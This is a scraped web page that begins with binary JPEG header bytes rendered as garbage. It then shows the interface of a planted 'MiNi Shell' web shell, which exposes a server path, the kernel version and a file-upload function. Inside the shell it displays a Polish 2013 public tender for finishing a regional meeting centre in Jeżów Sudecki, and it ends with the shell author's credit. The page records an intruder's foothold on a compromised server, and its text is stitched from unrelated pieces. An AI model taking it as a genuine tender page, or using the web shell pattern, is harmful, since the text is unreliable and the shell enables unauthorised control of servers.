JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130328/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130328/47059-N-2013.html

<p class="kh_header"><b>Jeżów Sudecki: EUROREGIONALNE CENTRUM SPOTKAŃ GMIN PARTNERSKICH - Etap II
 W JEŻOWIE SUDECKIM , UL. KRĘTA 27
                - kontynuacja robót budowlanych po przerwanej realizacji zamówienia -</b><br>
<b>Numer ogłoszenia: 47059 - 2013; data zamieszczenia: 28.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Jeżów Sudecki , ul. Długa 63, 58-521 Jeżów Sudecki, woj. dolnośląskie, tel. 757 132 254, -255, -257, faks 757 132 254, -255, -257.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> EUROREGIONALNE CENTRUM SPOTKAŃ GMIN PARTNERSKICH - Etap II
 W JEŻOWIE SUDECKIM , UL. KRĘTA 27
                - kontynuacja robót budowlanych po przerwanej realizacji zamówienia -.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest kontynuacja robót budowlanych, po odstąpieniu od umowy przez dotychczasowego Wykonawcę, na zadaniu pn. Euroregionalne Centrum Spotkań Gmin Partnerskich - Etap II       w Jeżowie Sudeckim, ul. Kręta 27.

Zadanie dotyczy adaptacji wraz z rozbudową  budynku d. Szkoły Szybowcowej  ww. Euroregionalne Centrum      z pozostałym do wykonania zakresem rzeczowym określonym w Przedmiarach robót stanowiących załączone do SIWZ pliki oznaczone jako ogólnie jako [5] oraz dodatkowo wykonaniem 
instalacji zapobiegającej zadymieniu klatki schodowej wg Projektu budowlanego zamiennego oznaczonego jako plik [3]

Budynek, przeznaczony do adaptacji składa się z dwóch zasadniczych części:
- budynku głównego ( części wysokiej)  - 3 kondygnacyjnego, z poddaszem nieużytkowym,
- części niskiej - 2 kondygnacyjnej, z poddaszem nieużytkowym.

2. Do zakończenia realizacji zadania, poza wykonaniem instalacji zapobiegającej  zadymieniu klatki schodowej pozostało ogólnie do wykonania:

(a)  z robót budowlanych: 
       -  wykonanie na posadzkach warstwy poziomującej, wyrównawczej z cienkowarstwowego jastrychu~ 279,2m2; 
       -  ułożenie posadzek z płytek gresowych  ~ 105,43m2  i cokolików przypodłogowych~ 185,24 m2;
       -  spoinowanie płytek ~133,7m2
       -  ułożenie, na klatce schodowej, posadzki z prostokątnych elementów granitu    polerowanego ~ 46,5m2  wraz z cokolikami ~30,0m2;
       -  instalacja posadzek z wykładzin sztucznych, obiektowych, zgrzewanych ~471,0m2;
       -  ułożenie posadzki drewnianej  z deszczułek dębowych (parkiet) ~323,7m2, listwy przypodłogowe ~122,6mb 
       -  założenie listew przyściennych drewnianych ~ 78,0m i listew z tworzyw sztucznych ~134,2m
       -  licowanie ścian płytkami ceramicznymi~ 38,7m2;
       -  gruntowanie podłoży ogółem ~829,5m2
       -  malowanie ścian i sufitów farbami emulsyjnymi ~ 3 158,6m2, w tym: jednokrotnie ~2 075,4m2; dwukrotnie ~ 1 083,2m2
       -  założenie anemostatów kołowych  ~6szt i kratek wentylacyjnych ~35szt;
       -  przewody kabelkowe układane w korytkach - 6,7m 
       -  założenie stolarki drzwiowej wew. -1 szt., drewnianej stolarki okiennej -1 szt. wraz z prefabrykowanym podokiennikiem,
       -  obudowa elementów konstrukcji płytami GK ~4,4m2 
       - wykucie starej i wykonanie, na klatce schodowej, nowej balustrady z rury stalowej ~ 27,2 kg;
       - montaż na dachu płotków śniegowych ~103m;
       - uzupełnienie wyprawy elewacyjnej - cienkowarstwowy tynk  ~ 6,1m2
       - inne drobne, takie jak: skucia nierówności betonu, listwy przyścienne podłogowe, uzupełnienie posadzki, przemurowanie ścianki, uzupełnienie tynków, obróbki blacharskie z blachy powlekanej, naprawa  rynien, wstawienie czyszczaków, obudowa elementów konstrukcji płytami GK, 
       - montaż kabin ustępowych z płyt wiórowych laminowanych- 3 szt.

(b)  z robót elektrycznych:   
       - montaż konstrukcji wsporczych i montaż anten  stacjonarnych UKF - 5 szt.;
       - montaż i podwieszanie przyłącza antenowego  ~ 30mb;
       - montaż opraw oświetleniowych- świetlówkowych ~227 kpl;
       - montaż opraw oświetleniowych żarowych ~10 kpl;
       - tablica rozdzielcza -1 szt.;
       - przewody kabelkowe wciągane do rur ~ 104 mb;
       - montaż gniazd instalacyjnych wtyczkowych ~ 151 szt.;
      - wykonanie badania i  pomiarów między innymi: szumu i zakłóceń, natężenia oświetlenia, instalacji  uziemiającej, skuteczności zerowania, rezystancji izolacji instalacji elektrycznej,
      - sprawdzenie między innymi: samoczynnego włączania zasilania, obwodu elektrycznego i linii kablowej NN.

 (c)  z robót sanitarnych:  
                   - wykonanie izolacji termicznej rurociągów w obrębie kotłowni; 
           - wykonanie białego montażu: ustępy typu kompakt - 2 szt., muszla ustępowa- 2 szt., zlewy żeliwne- 5 kpl, umywalki na postumencie-2 kpl, baterie zmywakowe i umywalkowe - 19 szt., 
           - płukanie instalacji wodociągowej ~1200m
           - uruchomienie węzła cieplnego
           - regulacja i pomiary wentylacji mechanicznej (24anemostaty)- 1 kpl.

              2.1 Instalacja zapobiegająca zadymieniu klatki schodowej.
              Przyjęto rozwiązanie polegające na doprowadzaniu świeżego powietrza z zewnątrz i odprowadzaniu powietrza    
              z przestrzeni wydzielonej klatki schodowej przy pomocy wentylatorów: nawiewnego nawiewającego czyste     
              powietrze na najniższym poziomie klatki schodowej i wentylatora wyciągowego odprowadzającego powietrze        
              z klatki schodowej obudowanym kanałem prowadzonym przez poddasze nieużytkowe i dach do przestrzeni zewnętrz.
 Oba wentylatory sterowane będą za pośrednictwem centralki sterującej z kontrolką obwodów zasilania silników,    
 załączników i czujki umieszczonej pod stropem nad biegiem schodów prowadzących na I piętro.   
 
3.  Materiały wymienione w pliku oznacz. jako [6] należy traktować jako dostawę inwestorską (Zamawiającego).   
4. Instalację zapobiegającą zadymieniu klatki schodowej należy wykonać w całości wg Projektu budowlanego zamiennego oznaczonego jako plik [3]..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje zamówienie uzupełniające .

Zamówienie uzupełniające może być udzielone wybranemu Wykonawcy w drodze niniejszego postępowania, kiedy zaistnieje konieczność powtórzenia tego samego rodzaju zamówienia zgodnego                       z przedmiotem zamówienia objętego postepowaniem, o wartości nie większej niż  50% wartości zamówienia podstawowego i w okresie do 3 lat od udzielenia tego zamówienia. 
W przypadku konieczności udzielenia zamówienia uzupełniającego Strony rozliczać się będą kosztorysem powykonawczym, przyjmując ceny jednostkowe ujęte w kosztorysie ofertowym na realizację zamówienia objętego niniejszym postępowaniem i złożonym przez Wykonawcę przed podpisaniem umowy lub wg cen czynników produkcji  wyszczególnionych w tym kosztorysie ofertowym. 

Ceny materiałów i sprzętu przyjmowane będą  na podstawie średnich cen publikowanych w bazie cenowej Sekocenbud,  z okresu wbudowania materiałów lub użycia sprzętu, a w przypadku braku- z poprzedniego okresu lub dowodów zakupu i/lub najmu sprzętu.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.31.50-9, 45.26.12.10-9, 45.26.25.00-6, 45.31.00.00-0, 45.32.00.00-6, 45.33.10.00-6, 45.33.20.00-3, 45.41.00.00-4, 45.42.10.00-4, 45.43.00.00-4, 45.44.21.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.06.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wymagane wniesienie wadium w wysokości 6 000zł (sześć tysięcy złotych) w jednej lub kilku z dopuszczonych form: pieniądz; poręczenia bankowe lub poręczenia spóldzielczej kasy oszczędnościowo-kredytowej które są zawsze zobowiązaniem pieniężnym; gwarancjach bankowych; gwarancjach ubezpieczeniowych; poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 09.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jednolity z 2007r. Dz. U. Nr 42,  poz. 275, z późniejszymi zmianami)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest do przedłożenia Wykazu wykonanych robót budowlanych w okresie ostatnich 5 lat przed upływem terminu  składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz  z podaniem ich rodzaju i wartości, daty                  i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Decyzja,które roboty budowlane widniejące w ww.Wykazie są najważniejsze, pozostawiona jest Wykonawcy, z zastrzeżeniem zdania następnego. Zamawiajacy uzna warunek za spełniony w oparciu o   złożone przez Wykonawcę Oświadczenie wg wzoru stanowiącego Załącznik Nr 2 i wykazane w ww.Wykazie realizacje, z których co najmniej dwie dotyczyć powinny robót budowlanych, w zakresie których było między innymi wykonanie instalacji elektrycznych i instalacji sanitarnych, i które zostały poparte  załączonymi ww. dowodami wydanymi przez podmiot, na rzecz którego te roboty budowlane zostały wykonane.Wzór Wykazu robót budowlanych stanowi załacznik Nr 4. Przy realizacji zamóienia Wykonawca może polegać  na wiedzy i doświadczeniu innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków. 

Jeżeli Wykonawca,wykazując spełnienie warunków, o których mowa w art.22 ust.1 upzp., polegać będzie na  zasobach innych podmiotów na zasadach określonych w art.26 ust.2b upzp, Zamawiający żąda, w celu oceny czy Wykonawca będzie dysponował zasobami innych podmiotów w stopnie niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, udowodnienia Zamawiającemu iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów wg wzoru stanowiącego  Załącznik Nr 7. W przypadku wspólnego ubiegania się wykonawców o udzielenie niniejszego zamówienia oceniana będzie ich łączna wiedza i doświadczenie.W tym celu dokumenty ma obowiązek złożyć ten 
lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie warunku.
Wykonawca lub Wykonawcy ubiegający się wspólnie o udzielenie zamówienia wraz z ofertą złoży lub złożą  oświadczenie o spełnieniu warunków udziału w postępowaniu ( art.22 ust. 1 upzp)  wg wzoru stanowiącego  Załącznik Nr 2 . 
Oświadczenie , o spełnieniu warunku o którym mowa w art. 22 ust.1 upzp. składa co najmniej jeden
z wykonawców ubiegający się wspólnie o udzielenie zamówienia występujący jako Lider albo wszyscy ci wykonawcy wspólnie albo  występujący w ich imieniu pełnomocnik.Oferta składana przez spółki cywilne jest traktowana jak oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien wskazać do uczestnictwa w wykonaniu niniejszego zamówienia między innymi kierownika budowy   posiadającego co najmniej trzy (3) lata doświadczenia zawodowego na stanowisku kierownika budowy, uprawnienia  
budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów.Przez wymagany minimalny okres  doświadczenia zawodowego należy rozumieć łączną ilość miesięcy przepracowanych  na stanowisku kierownika budowy, w okresie od daty uzyskania uprawnień budowlanych do daty ukazania się Ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych . Jeżeli wskazana wyżej wyżej osoba jest  obywatelem państw członkowskich Unii Europejskiej i nabyła w tych państwach, poza granicami Rzeczypospolitej Polskiej, kwalifikacje zawodowe do wykonywania samodzielnych funkcji w budownictwie, mając na względzie obowiązujące w Polsce przepisy prawa krajowego wymagane będzie od tej osoby uznanie jej kwalifikacji zawodowych. Postępowanie w sprawie uznania kwalifikacji zawodowych odbywa się na podstawie ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. Nr 63, poz. 394). Wykonawca  zobowiązany jest przedłożyć: Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz  informacją o podstawie dysponowania tymi osobami -  wg wzoru stanowiącego Załącznik Nr 5. jak również Oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.  Zamawiający uzna warunek za spełniony w oparciu o złożone przez Wykonawcę  Oświadczenie wg wzoru stanowiącego Załącznik Nr 2 ,  przedłożony Wykazu osób wraz z  Oświadczeniem o posiadaniu uprawnień ,jeżeli ustawy nakładają obowiazek posiadania takich uprawnień.
Wykonawca  może polegać na  osobach zdolnych do wykonania niniejszego zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Jeżeli Wykonawca, wykazując spełnienie warunków, o których mowa w art.22 ust.1 upzp., polegać będzie na  zasobach innych podmiotów na zasadach określonych w art.26 ust.2b upzp, Zamawiający żąda, w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopnie niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów udowodnienia Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów wg wzoru stanowiącego  Załącznik Nr 7. W przypadku wspólnego ubiegania się wykonawców o udzielenie niniejszego zamówienia oceniany będzie ich   łączny potencjał  kadrowy. W tym celu dokumenty ma obowiązek złożyć ten 
lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie warunku.Wykonawca  lub wykonawcy ubiegający się wspólnie o udzielenie zamówienia wraz z ofertą złoży lub złożą  oświadczenie o spełnieniu warunków udziału w postępowaniu ( art.22 ust. 1 upzp)  wg wzoru stanowiącego  Załącznik Nr 2. Oświadczenie o spełnianiu  warunku, o których mowa w art. 22 ust. 1 składa co najmniej jeden z wykonawców ubiegający się wspólnie o udzielenie zamówienia występujacy jako Lider albo wszyscy ci wykonawcy wspólnie albo pelnomocnik w ich imieniu.Oferta składana przez spółki cywilne jest traktowana jak oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Wykonawca jest zobowiązany do wskazania w Wykazie robót budowlanych co najmniej dwóch (2) realizacji dotyczących  robót budowlanych, w zakresie których było między innymi wykonanie instalacji elektrycznych  i instalacji sanitarnych, popartych  załączonymi  dowodami potwierdzajacymi,że  zostały wykonane w sposób należyty oraz wskazujących, że zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone, wydanymi przez podmiot na rzecz którego te roboty budowlane zostały wykonane;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.jezowsudecki.pl ; link_BIP; zakładka_przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ze strony internetowej Gminy i/lub w wersji papierowej w ciągu 5 dni od daty złożenia wniosku do Zamawiającego z dowodem wniesienia opłaty 250 zł za wykonanie kserokopii Dokumentacji Projektowej.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.04.2013 godzina 10:00, miejsce: Urząd Gminy Jeżów Sudecki , 58-521 Jeżów Sudecki , ul. Długa 63 lub bezpośrednio do sekretariatu Urzędu Gminy - I piętro ( adres j. w.).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie jest dofinansowane środkami Europejskiego Funduszu Rozwoju Regionalnego : INWESTUJEMY W WASZĄ PRZYSZŁOŚĆ , w ramach Programu Operacyjnego Współpracy Transgranicznej Polska-Saksonia 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com